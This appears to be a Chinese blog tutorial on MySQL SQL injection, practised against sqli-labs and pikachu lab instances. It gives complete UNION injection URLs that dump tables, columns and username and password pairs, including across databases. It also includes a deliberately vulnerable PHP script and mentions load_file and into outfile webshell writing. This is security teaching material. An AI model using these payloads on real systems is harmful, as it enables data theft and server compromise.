当前位置: 首页 > news >正文

Mysql注入

news 来源:原创 2024/4/27 23:56:17

💪💪mysql注入

  • 前言
  • 1.mysql之union注入
      • 1.1.判断是否有注入:
      • 1.2.信息收集
      • 1.3.进行注入
      • 1.4.完整注入实列
  • 2. mysql 跨库注入:
      • 2.1第一步就是找到数据库
      • 2.2第二步就是注入
  • 3.自己写union注入
  • 4.其他注入操作

前言

💎💎我们都知道数据库的种类大约有200多种,各种数据库不经相同,所以不同的数据库漏洞也不相同,这里我分数据库讲解sql注入,这里我先讲mysql数据库,以后会出其他数据库的注入,整体讲解思路如下:

在这里插入图片描述

1.mysql之union注入

1.1.判断是否有注入:

⚠️⚠️我们平时判断注入:and 1=1 , and 1=2;那为啥这种语句能够判断注入了,先看如下代码:

$id = $_GET['id'];
$db = new PDO('mysql:host=localhost;dbname=test','root','root');
$sql = "select * from user where id = $id";
$db->query($sql);

⚠️⚠️你不用搞懂如上代码,你只需要知道,存在注入,就是我们写入的sql语句能够被执行,不存在注入,就是我们写入的sql语句不能够被执行,

  1. 如果我写在网站后面输入?id=1,sql语句执行如下:select * from user where id = 1;我们知道and运算符,必须两边为真才为真,假设我们输入?id=1 and 1=1,sql语句执行如下:
  2. select * from user where id = 1 and 1= 1;,这条语句会被执行,并且结果为真,页面会出现变化,如果我们输入?id=1 and 1=2,sql语句执行如下:
  3. select * from user where id = 1 and 1= 2;这条语句会被执行,并且结果为假,页面不会出现变化 存在注入说明我输入的语句会被执行,如果不存在注入,不管sql语句是否为真,都不会执行

1.2.信息收集

  • 数据库版本:select version();请添加图片描述

  • 数据库用户:select user();

  • 数据库名:select database():当前数据库 , show databases ;所有数据库

  • 操作系统:select @@version_compile_os;

1.3.进行注入

💎💎 进行注入的顺序为 数据库 => 表 => 列 => 类容,我接下来以sqlabs第一关来演示:

1.4.完整注入实列

  1. 首先第一步还是看题:
    请添加图片描述
  2. 看到我们要干什么了,我们就可以进行注入探测了
    请添加图片描述

💪💪 以上是注入判断过程

  1. 存在注入后我们查看原sql语句所涉及的表有多收列,,知道原表有多少列后,我们方便进行union联合注入,原因如下:

💪💪union运算符
条件:
a.两边选择的列数必须相同,否则会报错
b.union剔除了重复项,union all不会剔除重复项
c.UNION结果集中的列名总是等于UNUIN中第一个SELECT语句中的列名

请添加图片描述
请添加图片描述
4. 由上面两张图片,我们可以知道,原表有三列,所以我们进行union注入的时候,要select 1,2,3,然后我们查看输出点,只有知道了输出点,我们才可以知道,在什么地方写上我们的注入语句
请添加图片描述
5. 由于输出了2,3所以select 1,2,3中,我们要把2,3替换掉我们的sql语句
请添加图片描述
请添加图片描述

💪💪以上是信息搜集,我们可以知道当前数据库为security,所以我门可以获取security数据库的信息,获取以上信息,我们还必须知道如下知识点:

⚠️⚠️ mysql表
5.0版本以上有的表:
@@version_compile_os 操作系统版本
information_schema 自带数据库
information_schema.schemata 数据库
schema_name
information_schema.tables 数据表
table_schema
table_name
information_schema.columns 数据列
column_name
table_name
table_schema

  1. 获取表名

http://192.168.87.130/sql/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

在这里插入图片描述

  1. 获取列名

ttp://192.168.87.130/sql/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security' --+ 获取列名要带上数据库,不同的数据库可能有相同的表

在这里插入图片描述

  1. 获取数据

http://192.168.87.130/sql/Less-1/?id=-1' union select 1,username,password from users where database()='security' --+,还可以使用limit获取其他数据
http://192.168.87.130/sql/Less-1/?id=-1' union select 1,username,password from users where database()='security' limit 1,1--+:前面的1是获取第几行的数据,后面的1是获取几个数据

在这里插入图片描述

以上是获取信息的步骤,获取信息都要带上数据库名,这是重点,一定要记住

2. mysql 跨库注入:

假设在你的服务器上面有多个网站,每个网站都有数据库,如果你的某个网站存在sql注入,刚好sql注入用户权限较高,这样你就可以查询其他网站数据库信息,在这里我使用sqliablpikachu

2.1第一步就是找到数据库

一般来说,网站名字和数据库名字都是有联系的,比如说我们要找pikachu网站,就去找数据库为pikachu的数据库

重点:如下查找数据库的时候,不要通过information_schema.tablesinformation_schema.columns表去找,不然你会发现查找的数据库都是information_schema,不是以上两个表没有table_schema这个选项,而是因为数据库非常多,前面都是information_schema,后面才有其他的表,通过information_schamata表查找才是最好的

在这里插入图片描述

  1. 选择第二条语句找数据库
  • 1.http://192.168.87.130/sql/Less-2/?id=-1 union select 1,group_concat(table_schema),3 from information_schema.tables --+
  • 2.http://192.168.87.130/sql/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+
    在这里插入图片描述

2.2第二步就是注入

  1. 找到数据库后找表信息
  • http://192.168.87.130/sql/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.columns where table_schema='pikachu' --+
    请添加图片描述
  1. 找表信息后找列名
  • http://192.168.87.130/sql/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='pikachu' and table_name='users'--+
    在这里插入图片描述
  1. 找信息

http://192.168.87.130/sql/Less-2/?id=-1 union select 1,username,password from pikachu.users --+这条语句的结果如下:但是http://192.168.87.130/sql/Less-2/?id=-1 union select 1,username,password from users where database()='pikachu'这条语句却得不到如下的结果,这是因为当前database()指定的是当前数据库
在这里插入图片描述

3.自己写union注入

先创建数据库

create database loophole;
use loophole;
create table sql_test(
    id int auto_increment,
    primary key (id),
    username char(10),
    address char(20)
);
insert into sql_test values (1,'admin1','hubei'),(2,'mozhe','beijin'),(3,'admin','hubei'),(4,'yk','ensi');

<?php
echo "<h1>UNION注入</h1>";
$con = mysqli_connect("localhost","root","901026yk","loophole");
if(mysqli_connect_error())
{
    echo "连接错误" . mysqli_connect_error();
}

$id = $_GET['id'] ?? 1;

$sql = <<<SQL
select * from sql_test where id = $id;
SQL;

$result = mysqli_query($con,$sql);
$result = mysqli_query($con,$sql);
 
$row = mysqli_fetch_all($result);
 
echo $row[0][1] . $row[0][2];

按照如上操作,你就自己写了一个漏洞了,是不是很轻松了

4.其他注入操作

  1. 文件读
  • load_file() :读取敏感信息 读一些默认路径文件,获取路径获取指定路径文件,路径获取方法如下:
  1. 报错显示,
    请添加图片描述
  1. 遗留文件
    在这里插入图片描述
  1. 漏洞报错
  1. 平台配置文件
  1. 爆破
  1. 文件写

into outfile :写入后门,但是当MySQL服务器运行时带有——secure-file-priv选项时,它不能执行此语句。secure-file-priv概念

magic_quotes_gpc,绕过magic_quotes_gpc对路径进行编码magic_quotes_gpc这个开关和addslashes()一样
sql注入过滤函数:
is_int()
数据库用户:高权限用户可以写入,结合文件读写,可以直接写入webshell,这样直接得到网站控制权
网站路径:和数据库用户结合,得不到数据库用户最高权限不能写入,不知道路径不能webshell写到哪

相关文章:

  • 测开 - 进阶篇 - 细节狂魔
  • 四旋翼无人机学习第4节--STM32、MPU9250等器件的绘制
  • Linux系统中利用open函数多次打开同一个文件操作方法
  • Windows下安装及卸载程序可用的添加和删除当前路径到环境变量的bat脚本以及如何和inno setup结合使用的实例
  • 【无标题】
  • stm32f103c6t6下的HAL库搭建三种低功耗模式
  • 多态
  • 彻底理解Java并发:synchronized关键字
  • 由一个按键程序引发的思考(上)
  • CDH大数据平台 21Cloudera Manager Console之azkaban与freeIPA、Kerberos等组合配置(markdown新版二)
  • Web开发:Web开发中的域概念整理与解读
  • html制作一个酷炫的记事本(源码)
  • Java项目:超市管理系统(java+SSM+JSP+LayUI+jQ+Mysql)
  • MATLAB 2--结构化程式与自定义函数
  • Go学习笔记 -- 并发原理
  • 【MindSpore产品】【数据处理功能】加入数据增强之后,报出卷积输入类型不同的问题
  • 基于Nexus搭建docker镜像源仓库
  • Estimating High-Dimensional Directed Acyclic Graphs with the PC-Algorithm
  • Linux文件查找find
  • Vue--》Vue中实现数据代理